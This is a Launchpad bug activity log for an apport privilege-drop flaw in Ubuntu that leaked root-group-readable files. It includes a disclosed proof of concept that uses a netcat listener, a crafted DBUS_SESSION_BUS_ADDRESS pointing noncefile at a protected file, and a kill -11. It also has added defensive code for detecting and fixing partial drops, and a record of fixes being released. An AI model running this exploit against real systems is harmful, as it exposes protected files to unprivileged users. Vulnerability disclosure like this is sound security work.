2020-06-29 21:26:10 |
Steve Beattie |
bug |
|
|
added bug |
2020-06-29 21:29:25 |
Steve Beattie |
description |
Fill me in |
-- VULNERABILITY DETAILS ------------------------
* Version tested: 18.04.4 LTS amd64 server
* Installer file: ubuntu-18.04.4-live-server-amd64.iso
* Platform tested: -
---
### Analysis
Apport, which is the crash reporter in Ubuntu, will execute gdbus to check if the pid is in a closing user session. Before executing the binary, it drops privileges to the crashed process's uid. But it doesn't drop the group id, so it can be used to leak a file which is owned by the root group.
This allows anyone to read a file which can only be read by the root group, but the file size must be 16 bytes.
Reproduction steps:
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi@ubuntu:/tmp$
```
~~~python
# Excerpt from inside a function; dbus_addr and error_log are defined elsewhere.
orig_uid = os.geteuid()
os.setresuid(-1, os.getuid(), -1)  # <-- did not set gid
try:
    # gdbus runs with the crashed process's uid but still with the root gid
    gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
                              'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
                              'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
    (out, err) = gdbus.communicate()
    if err:
        error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
    error_log('gdbus call failed, cannot determine running session: ' + str(e))
    return False
finally:
    # restore the original effective uid
    os.setresuid(-1, orig_uid, -1)
~~~
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga (@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative |
|
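The report above describes a uid-only privilege drop that leaves the root group on the spawned helper. The following is an added example, not part of the bug report and not apport's own code or fix: a check that flags such a partial drop from `/proc/<pid>/status` content, and a temporary drop that covers uid, gid and supplementary groups. The function names and sample status text are hypothetical, and the drop helper assumes the caller has effective uid 0 with the target user's real uid and gid, and that the child needs no other supplementary groups.

```python
import os
from contextlib import contextmanager


def partial_drop_findings(status_text):
    """Flag root group credentials left on a process whose effective uid is not root.

    status_text is the content of /proc/<pid>/status (Uid:/Gid:/Groups: lines).
    """
    fields = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key in ("Uid", "Gid", "Groups"):
            fields[key] = [int(v) for v in value.split()]
    findings = []
    # Uid/Gid columns are: real, effective, saved, filesystem.
    if fields["Uid"][1] != 0:
        if fields["Gid"][1] == 0:
            findings.append("effective gid is still 0")
        if 0 in fields.get("Groups", []):
            findings.append("supplementary groups still include gid 0")
    return findings


@contextmanager
def dropped_to_real_ids():
    """Hypothetical helper: swap effective ids to the real ids, groups included.

    Assumes the caller has effective uid 0 and real uid/gid of the target user.
    """
    orig_euid, orig_egid, orig_groups = os.geteuid(), os.getegid(), os.getgroups()
    os.setgroups([os.getgid()])         # needs privilege, so do it before the uid changes
    os.setresgid(-1, os.getgid(), -1)   # group before user, same reason
    os.setresuid(-1, os.getuid(), -1)
    try:
        yield  # spawn the helper process here
    finally:
        os.setresuid(-1, orig_euid, -1)  # regain euid 0 first, then the groups
        os.setresgid(-1, orig_egid, -1)
        os.setgroups(orig_groups)


# Constructed sample: uid dropped to 1001, root group credentials left behind.
SAMPLE_PARTIAL = "Name:\tgdbus\nUid:\t1001\t1001\t1001\t1001\nGid:\t1001\t0\t0\t0\nGroups:\t0 \n"
# Constructed sample: uid, gid and supplementary groups all dropped.
SAMPLE_FULL = "Name:\tgdbus\nUid:\t1001\t1001\t1001\t1001\nGid:\t1001\t1001\t1001\t1001\nGroups:\t1001 \n"
```
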
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Eoan |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Eoan) |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Xenial |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Xenial) |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Focal |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Focal) |
|
2020-06-29 21:55:52 |
Steve Beattie |
nominated for series |
|
Ubuntu Bionic |
|
2020-06-29 21:55:52 |
Steve Beattie |
bug task added |
|
apport (Ubuntu Bionic) |
|
2020-06-29 21:56:12 |
Steve Beattie |
apport (Ubuntu Focal): status |
New |
Confirmed |
|
2020-06-29 21:56:19 |
Steve Beattie |
apport (Ubuntu Focal): importance |
Undecided |
Medium |
|
2020-06-29 21:56:22 |
Steve Beattie |
apport (Ubuntu Eoan): importance |
Undecided |
Medium |
|
2020-06-29 21:56:24 |
Steve Beattie |
apport (Ubuntu Bionic): importance |
Undecided |
Medium |
|
2020-06-29 21:56:27 |
Steve Beattie |
apport (Ubuntu Xenial): importance |
Undecided |
Medium |
|
2020-06-29 21:56:30 |
Steve Beattie |
apport (Ubuntu): importance |
Undecided |
Medium |
|
2020-06-30 00:02:47 |
Steve Beattie |
apport (Ubuntu Xenial): status |
New |
Confirmed |
|
2020-06-30 00:02:50 |
Steve Beattie |
apport (Ubuntu Bionic): status |
New |
Confirmed |
|
2020-06-30 00:02:54 |
Steve Beattie |
apport (Ubuntu Eoan): status |
New |
Confirmed |
|
2020-06-30 06:37:12 |
Steve Beattie |
cve linked |
|
2020-11936 |
|
2020-08-04 16:58:15 |
Launchpad Janitor |
apport (Ubuntu Focal): status |
Confirmed |
Fix Released |
|
2020-08-04 16:58:15 |
Launchpad Janitor |
cve linked |
|
2020-15701 |
|
2020-08-04 16:58:15 |
Launchpad Janitor |
cve linked |
|
2020-15702 |
|
2020-08-04 16:58:25 |
Launchpad Janitor |
apport (Ubuntu Xenial): status |
Confirmed |
Fix Released |
|
2020-08-04 17:08:33 |
Launchpad Janitor |
apport (Ubuntu Bionic): status |
Confirmed |
Fix Released |
|
2020-08-05 20:56:58 |
Launchpad Janitor |
branch linked |
|
lp:~ubuntu-core-dev/ubuntu/groovy/apport/ubuntu |
|
2020-08-07 16:15:18 |
Launchpad Janitor |
apport (Ubuntu): status |
New |
Fix Released |
|
2020-09-25 02:07:39 |
Seth Arnold |
information type |
Private Security |
Public Security |
|
2020-09-25 02:07:41 |
Seth Arnold |
bug |
|
|
added subscriber Ubuntu Bugs |
2022-05-10 12:34:48 |
Marc Deslauriers |
apport (Ubuntu Eoan): status |
Confirmed |
Won't Fix |
|
2022-06-27 10:28:13 |
Benjamin Drung |
bug task added |
|
apport |
|
2022-06-27 10:28:19 |
Benjamin Drung |
apport: status |
New |
Fix Released |
|
2022-06-27 10:28:20 |
Benjamin Drung |
apport: milestone |
|
2.21.0 |
|
2022-06-27 10:28:22 |
Benjamin Drung |
apport: importance |
Undecided |
Medium |
|